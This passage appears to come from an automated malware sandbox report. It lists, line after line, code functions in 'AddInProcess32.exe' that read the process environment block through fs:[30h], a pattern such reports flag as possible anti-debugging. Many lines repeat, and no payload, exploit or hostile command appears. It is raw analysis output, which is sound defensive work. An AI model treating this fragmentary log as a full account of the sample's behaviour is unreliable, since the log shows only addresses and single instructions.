Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187138A mov eax, dword ptr fs:[00000030h]	11_2_0187138A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BDB60 mov ecx, dword ptr fs:[00000030h]	11_2_017BDB60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BF358 mov eax, dword ptr fs:[00000030h]	11_2_017BF358
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01885BA5 mov eax, dword ptr fs:[00000030h]	11_2_01885BA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BDB40 mov eax, dword ptr fs:[00000030h]	11_2_017BDB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018353CA mov eax, dword ptr fs:[00000030h]	11_2_018353CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018353CA mov eax, dword ptr fs:[00000030h]	11_2_018353CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DDBE9 mov eax, dword ptr fs:[00000030h]	11_2_017DDBE9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187131B mov eax, dword ptr fs:[00000030h]	11_2_0187131B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]	11_2_017E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]	11_2_017E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]	11_2_017E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]	11_2_017E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]	11_2_017E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]	11_2_017E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01888B58 mov eax, dword ptr fs:[00000030h]	11_2_01888B58
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E4BAD mov eax, dword ptr fs:[00000030h]	11_2_017E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E4BAD mov eax, dword ptr fs:[00000030h]	11_2_017E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E4BAD mov eax, dword ptr fs:[00000030h]	11_2_017E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2397 mov eax, dword ptr fs:[00000030h]	11_2_017E2397
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EB390 mov eax, dword ptr fs:[00000030h]	11_2_017EB390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C1B8F mov eax, dword ptr fs:[00000030h]	11_2_017C1B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C1B8F mov eax, dword ptr fs:[00000030h]	11_2_017C1B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F927A mov eax, dword ptr fs:[00000030h]	11_2_017F927A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B9240 mov eax, dword ptr fs:[00000030h]	11_2_017B9240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B9240 mov eax, dword ptr fs:[00000030h]	11_2_017B9240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B9240 mov eax, dword ptr fs:[00000030h]	11_2_017B9240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B9240 mov eax, dword ptr fs:[00000030h]	11_2_017B9240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F4A2C mov eax, dword ptr fs:[00000030h]	11_2_017F4A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F4A2C mov eax, dword ptr fs:[00000030h]	11_2_017F4A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]	11_2_017DA229
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D3A1C mov eax, dword ptr fs:[00000030h]	11_2_017D3A1C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B5210 mov eax, dword ptr fs:[00000030h]	11_2_017B5210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B5210 mov ecx, dword ptr fs:[00000030h]	11_2_017B5210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B5210 mov eax, dword ptr fs:[00000030h]	11_2_017B5210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B5210 mov eax, dword ptr fs:[00000030h]	11_2_017B5210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BAA16 mov eax, dword ptr fs:[00000030h]	11_2_017BAA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BAA16 mov eax, dword ptr fs:[00000030h]	11_2_017BAA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C8A0A mov eax, dword ptr fs:[00000030h]	11_2_017C8A0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187AA16 mov eax, dword ptr fs:[00000030h]	11_2_0187AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187AA16 mov eax, dword ptr fs:[00000030h]	11_2_0187AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2AE4 mov eax, dword ptr fs:[00000030h]	11_2_017E2AE4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2ACB mov eax, dword ptr fs:[00000030h]	11_2_017E2ACB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CAAB0 mov eax, dword ptr fs:[00000030h]	11_2_017CAAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CAAB0 mov eax, dword ptr fs:[00000030h]	11_2_017CAAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EFAB0 mov eax, dword ptr fs:[00000030h]	11_2_017EFAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187EA55 mov eax, dword ptr fs:[00000030h]	11_2_0187EA55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01844257 mov eax, dword ptr fs:[00000030h]	11_2_01844257
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]	11_2_017B52A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]	11_2_017B52A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]	11_2_017B52A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]	11_2_017B52A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]	11_2_017B52A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0186B260 mov eax, dword ptr fs:[00000030h]	11_2_0186B260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0186B260 mov eax, dword ptr fs:[00000030h]	11_2_0186B260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017ED294 mov eax, dword ptr fs:[00000030h]	11_2_017ED294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017ED294 mov eax, dword ptr fs:[00000030h]	11_2_017ED294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01888A62 mov eax, dword ptr fs:[00000030h]	11_2_01888A62
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DC577 mov eax, dword ptr fs:[00000030h]	11_2_017DC577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DC577 mov eax, dword ptr fs:[00000030h]	11_2_017DC577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018805AC mov eax, dword ptr fs:[00000030h]	11_2_018805AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018805AC mov eax, dword ptr fs:[00000030h]	11_2_018805AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D7D50 mov eax, dword ptr fs:[00000030h]	11_2_017D7D50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F3D43 mov eax, dword ptr fs:[00000030h]	11_2_017F3D43
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E4D3B mov eax, dword ptr fs:[00000030h]	11_2_017E4D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E4D3B mov eax, dword ptr fs:[00000030h]	11_2_017E4D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E4D3B mov eax, dword ptr fs:[00000030h]	11_2_017E4D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]	11_2_017C3D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]	11_2_01836DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]	11_2_01836DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]	11_2_01836DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836DC9 mov ecx, dword ptr fs:[00000030h]	11_2_01836DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]	11_2_01836DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]	11_2_01836DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BAD30 mov eax, dword ptr fs:[00000030h]	11_2_017BAD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187FDE2 mov eax, dword ptr fs:[00000030h]	11_2_0187FDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187FDE2 mov eax, dword ptr fs:[00000030h]	11_2_0187FDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187FDE2 mov eax, dword ptr fs:[00000030h]	11_2_0187FDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187FDE2 mov eax, dword ptr fs:[00000030h]	11_2_0187FDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01868DF1 mov eax, dword ptr fs:[00000030h]	11_2_01868DF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CD5E0 mov eax, dword ptr fs:[00000030h]	11_2_017CD5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CD5E0 mov eax, dword ptr fs:[00000030h]	11_2_017CD5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0183A537 mov eax, dword ptr fs:[00000030h]	11_2_0183A537
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01888D34 mov eax, dword ptr fs:[00000030h]	11_2_01888D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187E539 mov eax, dword ptr fs:[00000030h]	11_2_0187E539
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01833540 mov eax, dword ptr fs:[00000030h]	11_2_01833540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01863D40 mov eax, dword ptr fs:[00000030h]	11_2_01863D40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E1DB5 mov eax, dword ptr fs:[00000030h]	11_2_017E1DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E1DB5 mov eax, dword ptr fs:[00000030h]	11_2_017E1DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E1DB5 mov eax, dword ptr fs:[00000030h]	11_2_017E1DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E35A1 mov eax, dword ptr fs:[00000030h]	11_2_017E35A1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EFD9B mov eax, dword ptr fs:[00000030h]	11_2_017EFD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EFD9B mov eax, dword ptr fs:[00000030h]	11_2_017EFD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]	11_2_017B2D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]	11_2_017B2D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]	11_2_017B2D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]	11_2_017B2D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]	11_2_017B2D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2581 mov eax, dword ptr fs:[00000030h]	11_2_017E2581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2581 mov eax, dword ptr fs:[00000030h]	11_2_017E2581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2581 mov eax, dword ptr fs:[00000030h]	11_2_017E2581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E2581 mov eax, dword ptr fs:[00000030h]	11_2_017E2581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017D746D mov eax, dword ptr fs:[00000030h]	11_2_017D746D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EA44B mov eax, dword ptr fs:[00000030h]	11_2_017EA44B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EBC2C mov eax, dword ptr fs:[00000030h]	11_2_017EBC2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01888CD6 mov eax, dword ptr fs:[00000030h]	11_2_01888CD6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836CF0 mov eax, dword ptr fs:[00000030h]	11_2_01836CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836CF0 mov eax, dword ptr fs:[00000030h]	11_2_01836CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836CF0 mov eax, dword ptr fs:[00000030h]	11_2_01836CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018714FB mov eax, dword ptr fs:[00000030h]	11_2_018714FB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]	11_2_01871C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0188740D mov eax, dword ptr fs:[00000030h]	11_2_0188740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0188740D mov eax, dword ptr fs:[00000030h]	11_2_0188740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0188740D mov eax, dword ptr fs:[00000030h]	11_2_0188740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836C0A mov eax, dword ptr fs:[00000030h]	11_2_01836C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836C0A mov eax, dword ptr fs:[00000030h]	11_2_01836C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836C0A mov eax, dword ptr fs:[00000030h]	11_2_01836C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01836C0A mov eax, dword ptr fs:[00000030h]	11_2_01836C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184C450 mov eax, dword ptr fs:[00000030h]	11_2_0184C450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184C450 mov eax, dword ptr fs:[00000030h]	11_2_0184C450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C849B mov eax, dword ptr fs:[00000030h]	11_2_017C849B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01837794 mov eax, dword ptr fs:[00000030h]	11_2_01837794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01837794 mov eax, dword ptr fs:[00000030h]	11_2_01837794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01837794 mov eax, dword ptr fs:[00000030h]	11_2_01837794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CFF60 mov eax, dword ptr fs:[00000030h]	11_2_017CFF60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017CEF40 mov eax, dword ptr fs:[00000030h]	11_2_017CEF40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EE730 mov eax, dword ptr fs:[00000030h]	11_2_017EE730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B4F2E mov eax, dword ptr fs:[00000030h]	11_2_017B4F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017B4F2E mov eax, dword ptr fs:[00000030h]	11_2_017B4F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DF716 mov eax, dword ptr fs:[00000030h]	11_2_017DF716
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EA70E mov eax, dword ptr fs:[00000030h]	11_2_017EA70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EA70E mov eax, dword ptr fs:[00000030h]	11_2_017EA70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0188070D mov eax, dword ptr fs:[00000030h]	11_2_0188070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0188070D mov eax, dword ptr fs:[00000030h]	11_2_0188070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F37F5 mov eax, dword ptr fs:[00000030h]	11_2_017F37F5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184FF10 mov eax, dword ptr fs:[00000030h]	11_2_0184FF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184FF10 mov eax, dword ptr fs:[00000030h]	11_2_0184FF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01888F6A mov eax, dword ptr fs:[00000030h]	11_2_01888F6A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C8794 mov eax, dword ptr fs:[00000030h]	11_2_017C8794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0184FE87 mov eax, dword ptr fs:[00000030h]	11_2_0184FE87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DAE73 mov eax, dword ptr fs:[00000030h]	11_2_017DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DAE73 mov eax, dword ptr fs:[00000030h]	11_2_017DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DAE73 mov eax, dword ptr fs:[00000030h]	11_2_017DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DAE73 mov eax, dword ptr fs:[00000030h]	11_2_017DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017DAE73 mov eax, dword ptr fs:[00000030h]	11_2_017DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C766D mov eax, dword ptr fs:[00000030h]	11_2_017C766D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_018346A7 mov eax, dword ptr fs:[00000030h]	11_2_018346A7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01880EA5 mov eax, dword ptr fs:[00000030h]	11_2_01880EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01880EA5 mov eax, dword ptr fs:[00000030h]	11_2_01880EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01880EA5 mov eax, dword ptr fs:[00000030h]	11_2_01880EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C7E41 mov eax, dword ptr fs:[00000030h]	11_2_017C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C7E41 mov eax, dword ptr fs:[00000030h]	11_2_017C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C7E41 mov eax, dword ptr fs:[00000030h]	11_2_017C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C7E41 mov eax, dword ptr fs:[00000030h]	11_2_017C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C7E41 mov eax, dword ptr fs:[00000030h]	11_2_017C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C7E41 mov eax, dword ptr fs:[00000030h]	11_2_017C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0186FEC0 mov eax, dword ptr fs:[00000030h]	11_2_0186FEC0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BE620 mov eax, dword ptr fs:[00000030h]	11_2_017BE620
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01888ED6 mov eax, dword ptr fs:[00000030h]	11_2_01888ED6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EA61C mov eax, dword ptr fs:[00000030h]	11_2_017EA61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017EA61C mov eax, dword ptr fs:[00000030h]	11_2_017EA61C
